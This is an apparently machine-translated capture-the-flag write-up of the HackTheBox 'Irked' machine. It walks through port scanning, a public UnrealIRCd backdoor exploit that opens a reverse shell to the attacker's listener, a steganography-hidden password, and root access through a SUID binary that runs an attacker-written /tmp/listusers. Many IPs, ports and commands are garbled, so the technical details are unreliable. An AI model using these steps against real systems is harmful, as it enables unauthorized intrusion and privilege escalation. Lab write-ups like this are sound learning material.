disclaimer

The hosts infiltrated in this article are legally authorized. The tools and methods used in this article are only for learning and communication. Please do not use the tools and infiltration ideas used in this article for any illegal purposes. I am not responsible for any consequences arising therefrom, nor for any misuse or damage caused.

Service discovery

Let’s see what ports the target has open

Chrysene ─(root💀kali)-[~] ├ ─# nmap 08.07.88 -- open-p-starting nmap 08.88 (https://nmap.org) at 2021-12-22 03:47 EST Stats: 0:00:12 elapsed; 0 hosts Completed (1 UP), 1 Undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 4.25% done; ETC: 03:52 (0:04:30 remaining) Stats: 0:00:13 elapsed; 0 hosts Completed (1 UP), 1 Undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 4.68% done; ETC: 03:52 (0:04:25 remaining) Stats: 0:00:14 elapsed; 0 hosts Completed (1 UP), 1 Undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 5.19% done; ETC: 03:52 (0:04:16 remaining) Nmap scan report for 10.10.10.117 Host is up (0.31s latency). Not shown: 65492 closed ports, 36 filtered ports Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 111/tcp open rpcbind 6697/tcp open ircs-u 8067/tcp open infi-async 38540/tcp open unknown 65534/ TCP open Unknown Nmap done: 1 IP address (1 host up) Scanned in 113.95 secondsCopy the code

Get the details of these ports

┌ ─ ─ (root 💀 kali) - ~ / HTB/Irked └ ─ # nmap - sV - 22,80,111,6697,8067,38540,65534 Pn 10.10.10.117 - p - A - O 130 ⨯ Host Discovery disabled (-pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 (slower) https://nmap.org) at 2021-12-22 03:52 EST Nmap scan report for 10.10.10.117 Host is up (latency). PORT STATE The SERVICE VERSION 22 / TCP open SSH OpenSSH p1 Debian 6.7 5 + deb8u4 (protocol 2.0) | SSH - hostkey: | 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA) | 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA) | 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA) |_ 256 8 d: 1 b: 43: c7: d0:1 a: 4 c: 05: cf: 82: Ed: c1:01:6 3: a2:0 c (ED25519) 80 / TCP open HTTP Apache HTTPD 2.4.10 ((Debian)) | _http - server - the header: Apache / 2.4.10 (Debian) | _http - the title: Site doesn't have a title (text/html). 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | the program version port/proto service | 100000 2 and 4, 111 / TCP rpcbind | 100000 2 and 4, 111 / udp rpcbind | 3, 4, 111/100000 tcp6 Rpcbind | 100000 3, 4, 111 / udp6 rpcbind | 100024 1 33839 / udp status | 100024 1 38540 / TCP status | 100024 1 49259 / udp6 status |_ 100024 1 52644/tcp6 status 6697/tcp open irc UnrealIRCd 8067/tcp open irc UnrealIRCd 38540/tcp open status 1 (RPC #100024) 65534/tcp open irc UnrealIRCd Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2-4.9 (95%), Linux 3.8-3.11 (95%), Linux 4.8 (95%), Linux 4.4 (95%), Linux 4.2 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%) No exact OS matches for host (test conditions non ideal). Network Distance: 2 hops Service Info: Host: irked.htb; OS: Linux; CPE: Cpe :/ O: Linux :linux_kernel TRACEROUTE (using port 111/ TCP) HOP RTT ADDRESS 1 310.44 ms 10.10.14.12 311.20 ms 10.10.10.117 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/. Nmap Done: 1 IP address (1 host up) Scanned in 40.39 secondsCopy the code

Open port 80, the home page is a picture, there is a line of text

IRC is almost working!

Nothing else from the blowup catalog. The only place to start is with the IRC service.

An explanation of IRC services on wikipedia

Internet Relay Chat (IRC) is an application-layer protocol. It is mainly used for group chat, but can also be used for person-to-person chat. Use IRC server port 6667 (plaintext transmission, such as irc://irc.freenode.net), 6697 (SSL encryption transmission, such as ircs://irc.freenode.net: 6697), etc.

It sounds like a chat room

Try nc to connect to the service

Chrysene - (root💀kali)-[~/ HTB /Irked] ├ ─# nc10.10.10.688, scient.htb NOTICE AUTH :*** Looking up your hostname... :irked.htb NOTICE AUTH :*** Couldn't resolve your hostname; Using your IP address instead 10.10.14.3 :irked. HTB 451 10.10.14.3 :You have not registeredCopy the code

The initial shell

Do a Google search and find a possible backdoor to the service. Find exp on Github

Modify these two lines of code:

Local_ip = '10.10.14.3' # CHANGE THIS local_port = '4242' # CHANGE THISCopy the code

Start a listener

nc -lnvp 4242

Perform attack

Chrysene ─(root💀kali)-[~/ HTB /Irked] ├ ─# python3 irc_exp. Py 10.10.10.688 -payload python 1 ⨯ Exploit sent successfully!Copy the code

The rebound shell was received. Procedure

Chrysene ─(root💀kali)-[~/ HTB /Irked] ├ ─# nc-lnVP 862 listening on [any] 862... Connect to [10.10.14.3] from (UNKNOWN) [10.10.10.117] 55352 ircd@irked:~/Unreal3.2$ID ID UID =1001(ircd) GID =1001(ircd) Groups =1001(ircd) ircd@irked:~/Unreal3.2$whoami whoami ircd ircd@irked:~/Unreal3.2$Copy the code

User.txt under user djmardov, we do not have permission to view it

The right to djmardov

There is a backup file hidden in the sibling directory

ircd@irked:/home/djmardov/Documents$ cat .backup
cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

Copy the code

It looks a bit like djmardov’s password, but you can’t switch to djmardov directly. It’s probably encrypted ciphertext

Super elite steg backup pw

Steganography is Steganography, which usually hides information in an image. We know that port 80 has an image on its home page. We download the image locally and use the Steghide command to isolate the Steganography file

Chrysene ─(root💀kali)-[~/ HTB /Irked] ├ ─# imp. · Edited data to "pass.txt". (root💀kali)-[~/ HTB /Irked] ├ ─# cat pass.txt Kab6h+m+bbp2J:HGCopy the code

Get a pass. TXT file with the following contents: Kab6h+m+bbp2J:HG

It’s the password for djmardov. Get user.txt

ircd@irked:/home/djmardov/Documents$ su djmardov su djmardov Password: Kab6h+m+bbp2J:HG djmardov@irked:~/Documents$cat user.txt cat user.txtCopy the code

The right to the root

Using Linpea, look at the SUID

═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ╣ Interesting Files ╠ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ╔ ═ ═ ═ ═ ═ ═ ═ ═ ═ ═ ╣ SUID - Check easy privesc, Exploits and write perms ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid the strace Not Found -rwsr-xr-- 1 root messagebus 355K Nov 21 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper (Unknown SUID binary) -rwsr-xr-x 1 root root 9.3K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device (Unknown SUID binary) -rwsr-xr-x 1 root root 14K Sep 8 2016 /usr/lib/policykit-1/polkit-agent-helper-1 -rwsr-xr-x 1 root root 550K Nov 19 2017 /usr/lib/openssh/ssh-keysign -rwsr-xr-x 1 root root 14K Oct 14 2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper (Unknown SUID binary) -rwSR-xr-x 1 root root 1.1m Feb 10 2018 /usr/sbin/exim4-rwsr-xr -- 1 root dip 332K Apr 14 2015 /usr/sbin/pppd --> apple_mac_osx_10.4.8 (05-2007) -rwSR-xr -x 1 root root 43K May 17 2017 /usr/bin/chsh (Unknown SUID) binary) -rwsr-sr-x 1 root mail 94K Nov 18 2017 /usr/bin/procmail -rwsr-xr-x 1 root root 77K May 17 2017 /usr/bin/gpasswd -rwsr-xr-x 1 root root 38K May 17 2017 /usr/bin/newgrp --> hP-ux_10.20 -rwsr-sr-x 1 daemon daemon 50K Sep 30 2014 /usr/bin/at-> rtru64_unix_4.0g (cVE-2002-1614) -rwsr-xr-x 1 root root root 18K Sep 8 2016 /usr/bin/pkexec --> Linux4.10_to_5.1.17(CVE-2019-13272)/ rHEL_6 (CVE-2011-1485) -rWSR-sr-x 1 Root root 9.3k Apr 1 2014 /usr/bin/x-rwsr-xr-x 1  root root 52K May 17 2017 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/ SolarIS_8/9 (12-2004)/SPARC_8/9/ SUN_Solaris_2.3_TO_2.5.1 (02-1997) -RWSR-xr-x 1 root root 52K May 17 2017 /usr/bin/chfn --> suse_9.3/10 -rwsr-xr-x 1 root root 7.2k May 16 2018 /usr/bin/viewuser (Unknown SUID binary) -rwsr-xr-x 1 root root 95K Aug 13 2014 /sbin/mount.nfs -rwsr-xr-x 1 root root 38K May 17 2017 /bin/su -rwsr-xr-x 1 root Root 34K Mar 29 2015 /bin/mount --> Apple_Mac_OSX(Lion) _kernel_xnu-1699.32.7_EXCEPt_xnu-1699.24.8 - RWSR -xr-x 1 root root 34K Jan 21 2016 /bin/fusermount (Unknown SUID binary) -rwsr-xr-x 1 root root 158K Jan 28 2017 /bin/ntfs-3g ---> Debian9/8/7 / Ubuntu/Gentoo/others/Ubuntu_Server_16. 10 _and_others (02-2017) - RWSR xr - x 1 root root 26 k Mar 29, 2015 /bin/umount ---> BSD/Linux(08-1996)Copy the code

I find this command a bit fishy: /usr/bin/viewuser

Use the strings command to view

djmardov@irked:/tmp$ strings /usr/bin/viewuser /lib/ld-linux.so.2 libc.so.6 _IO_stdin_used setuid puts system __cxa_finalize __libc_start_main glibc_2.0 glibc_2.3_ITM_deregistertmclonetable __gmon_start__ _ITM_registerTMCloneTable UWVS [^_] This application is being devleoped to set and test user permissions It is still being actively developed /tmp/listusersCopy the code

This command will execute another command: / TMP /listusers

Listusers does not exist, and/TMP is writable

That’s easy. Create a ListUsers file

touch /tmp/listusers

Write commands to this file

echo “bash -p” > /tmp/listusers

Empowerment is enforceable

chmod +x listusers

Run SUID to raise rights to root

djmardov@irked:/tmp$ /usr/bin/viewuser This application is being devleoped to set and test user permissions It is still Being actively developed (Unknown) :0 2021-12-22 05:03 (:0) DJmardov PTS /1 2021-12-22 05:14 (10.10.14.3) root@irked:/tmp# id uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner) ,117(bluetooth) root@irked:/tmp# whoami root root@irked:/tmp# cat /root/root.txtCopy the code